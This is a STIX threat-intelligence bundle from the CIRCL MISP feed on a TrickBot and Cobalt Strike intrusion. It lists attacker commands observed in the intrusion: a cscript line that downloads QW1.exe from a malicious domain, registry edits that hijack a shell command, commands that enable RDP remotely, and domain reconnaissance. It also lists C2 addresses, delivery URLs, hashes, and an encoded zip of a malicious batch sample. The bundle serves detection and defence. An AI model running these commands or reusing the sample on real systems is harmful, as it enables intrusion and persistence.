misp-circl-feed/feeds/circl/stix-2.1/5e6793ed-2868-4474-a485-42210a0a020f.json


2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--5e6793ed-2868-4474-a485-42210a0a020f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2021-05-24T10:05:31.000Z",
"modified": "2021-05-24T10:05:31.000Z",
"name": "laskowski-tech.com",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5e6793ed-2868-4474-a485-42210a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2021-05-24T10:05:31.000Z",
"modified": "2021-05-24T10:05:31.000Z",
"name": "Trickbot Gtag QW1",
"published": "2020-07-03T03:59:04Z",
"object_refs": [
"x-misp-attribute--5e67962c-66ec-41ba-8e88-41160a0a020f",
"x-misp-attribute--5e67962c-5304-4794-a7f1-40e60a0a020f",
"x-misp-attribute--5e67962c-0d04-4a3b-b127-4f900a0a020f",
"x-misp-attribute--5e67962c-0890-41b4-8ad5-44c40a0a020f",
"x-misp-attribute--5e67962c-11bc-4765-8d63-426c0a0a020f",
"x-misp-attribute--5e67962d-056c-4010-89f9-44730a0a020f",
"x-misp-attribute--5e67962d-6efc-4391-a42e-43560a0a020f",
"x-misp-attribute--5e67962d-b170-4f39-b589-404f0a0a020f",
"x-misp-attribute--5e67962d-4778-40ea-bbb0-4d550a0a020f",
"x-misp-attribute--5e67962d-8e84-4b7c-82a2-48340a0a020f",
"x-misp-attribute--5e67962d-1a8c-4983-9d89-40c30a0a020f",
"x-misp-attribute--5e67962d-1a00-4fe1-b68c-4d190a0a020f",
"x-misp-attribute--5e67962d-d638-4805-b97a-46810a0a020f",
"x-misp-attribute--5e67962d-50d0-4ff7-8730-45a10a0a020f",
"x-misp-attribute--5e67962d-be20-40c3-a0fc-4c250a0a020f",
"x-misp-attribute--5e67962d-9430-4d3c-9e36-4f300a0a020f",
"x-misp-attribute--5e67962d-5e14-472f-a5ae-4c580a0a020f",
"x-misp-attribute--5e67962d-e270-4656-ad55-4dc10a0a020f",
"indicator--5e679919-46a8-43dd-b8a5-4ec174656a8a",
"indicator--5e679919-10c8-46d0-b1bb-4d4d74656a8a",
"indicator--5e6799c2-a134-491d-9d9e-4d4b0a0a020f",
"indicator--5e679a4c-e90c-4176-ac29-44f30a0a020f",
"indicator--5e679e17-e970-4164-bfb5-48b00a0a020f",
"indicator--5e679e17-4efc-46ea-9030-4d270a0a020f",
"indicator--5e67a5f9-ec68-41ea-adeb-40950a0a020f",
"observed-data--5e70b052-319c-47bf-a3a8-461c0a0a020f",
"url--5e70b052-319c-47bf-a3a8-461c0a0a020f",
"indicator--5e67a350-52bc-4280-95d9-4c180a0a020f",
"indicator--5e67a35f-bc6c-4a73-901f-4d400a0a020f",
"indicator--5e67a3aa-e8c0-4340-8080-475b0a0a020f"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
" Cobalt Strike Beacon",
"trickbot",
"Cobalt Strike",
"misp-galaxy:malpedia=\"TrickBot\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-66ec-41ba-8e88-41160a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd.exe /c C:\\DiskDrive\\1\\Volume\\errorfix.bat"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-5304-4794-a7f1-40e60a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cscript //nologo C:\\DiskDrive\\1\\Volume\\BackFiles\\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-0d04-4a3b-b127-4f900a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "powershell -C Sleep -s 4;Saps 'C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe'"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-0890-41b4-8ad5-44c40a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd[.]exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-11bc-4765-8d63-426c0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd.exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-056c-4010-89f9-44730a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-6efc-4391-a42e-43560a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-b170-4f39-b589-404f0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "\"%WINDIR%\\system32\\cmd[.]exe\" /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-4778-40ea-bbb0-4d550a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe \t/c net config workstation"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-8e84-4b7c-82a2-48340a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe /c ipconfig /all"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-1a8c-4983-9d89-40c30a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe \t/c net view /all"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-1a00-4fe1-b68c-4d190a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe \t/c net view /all /domain"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-d638-4805-b97a-46810a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe /c nltest /domain_trusts /all_trusts"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-50d0-4ff7-8730-45a10a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "\"%WINDIR%\\system32\\reg.exe\" add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-be20-40c3-a0fc-4c250a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd[.]exe /C reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-9430-4d3c-9e36-4f300a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-5e14-472f-a5ae-4c580a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd.exe /C WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-e270-4656-ad55-4dc10a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679919-46a8-43dd-b8a5-4ec174656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:04:10.000Z",
"modified": "2020-03-10T14:04:10.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '95.179.210.8']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:04:10Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Cobalt Strike"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679919-10c8-46d0-b1bb-4d4d74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:04:25.000Z",
"modified": "2020-03-10T14:04:25.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '50.87.170.67']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:04:25Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e6799c2-a134-491d-9d9e-4d4b0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:04:10.000Z",
"modified": "2020-03-10T14:04:10.000Z",
"pattern": "[url:value = 'https://serviceuphelper.com:80/avxbDFb']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\"",
"Cobalt Strike"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679a4c-e90c-4176-ac29-44f30a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:03:53.000Z",
"modified": "2020-03-10T14:03:53.000Z",
"pattern": "[url:value = 'http://customscripts.us/QW1.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\"",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679e17-e970-4164-bfb5-48b00a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:03:53.000Z",
"modified": "2020-03-10T14:03:53.000Z",
"pattern": "[domain-name:value = 'customscripts.us']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"domain\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679e17-4efc-46ea-9030-4d270a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:04:09.000Z",
"modified": "2020-03-10T14:04:09.000Z",
"pattern": "[domain-name:value = 'serviceuphelper.com']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"domain\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Cobalt Strike"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e67a5f9-ec68-41ea-adeb-40950a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:37:02.000Z",
"modified": "2020-03-10T14:37:02.000Z",
"pattern": "[url:value = 'http://64.44.133.131/images/cursor.png']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\"",
"trickbot"
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5e70b052-319c-47bf-a3a8-461c0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T11:11:14.000Z",
"modified": "2020-03-17T11:11:14.000Z",
"first_observed": "2020-03-17T11:11:14Z",
"last_observed": "2020-03-17T11:11:14Z",
"number_observed": 1,
"object_refs": [
"url--5e70b052-319c-47bf-a3a8-461c0a0a020f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5e70b052-319c-47bf-a3a8-461c0a0a020f",
"value": "https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e67a350-52bc-4280-95d9-4c180a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:25:20.000Z",
"modified": "2020-03-10T14:25:20.000Z",
"pattern": "[file:hashes.MD5 = 'b17e4833c580bbd343a1834be0e2a65f' AND file:hashes.SHA1 = '7ad2d4c4fe0efd021992391fcdb7e630a19f23f6' AND file:hashes.SHA256 = '5770d351522695562143fbf5d6381cb7c13151e3d3e1cdc923759bc60e025bbe' AND file:name = 'Jofert.exe' AND file:size = '385024' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:25:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e67a35f-bc6c-4a73-901f-4d400a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:25:35.000Z",
"modified": "2020-03-10T14:25:35.000Z",
"pattern": "[file:hashes.MD5 = '4368db27ef2f07171c2c13d2e537d459' AND file:hashes.SHA1 = '7993ebdea9421a85b431077b2d89ee3344180759' AND file:hashes.SHA256 = '17b8571df60a9953f7e50edcd623eca414ce9bae64362ba3ab0069778cf40a1a' AND file:name = 'errorfix.bat' AND file:size = '2864' AND (file:content_ref.payload_bin = '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' AND file:content_ref.x_misp_filename = 'errorfix.bat' AND file:content_ref.hashes.MD5 = '4368db27ef2f07171c2c13d2e537d459' AND file:content_ref.mime_type = 'application/zip' AND file:content_ref.encryption_algorithm = 'mime-type-indicated' AND file:content_ref.decryption_key = 'infected')]",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:25:35Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e67a3aa-e8c0-4340-8080-475b0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:26:50.000Z",
"modified": "2020-03-10T14:26:50.000Z",
"pattern": "[file:hashes.MD5 = 'd627615f955dd5342ef6b4c6938ad98c' AND file:hashes.SHA1 = '645467b3207a50c43be075a0b81308a5f6935c59' AND file:hashes.SHA256 = '1a508909a8ef020ab5285ce47106beac317c2ae0d2971eff9a4f95a5079eee7f' AND file:name = 'invoice.doc' AND file:size = '441560' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:26:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}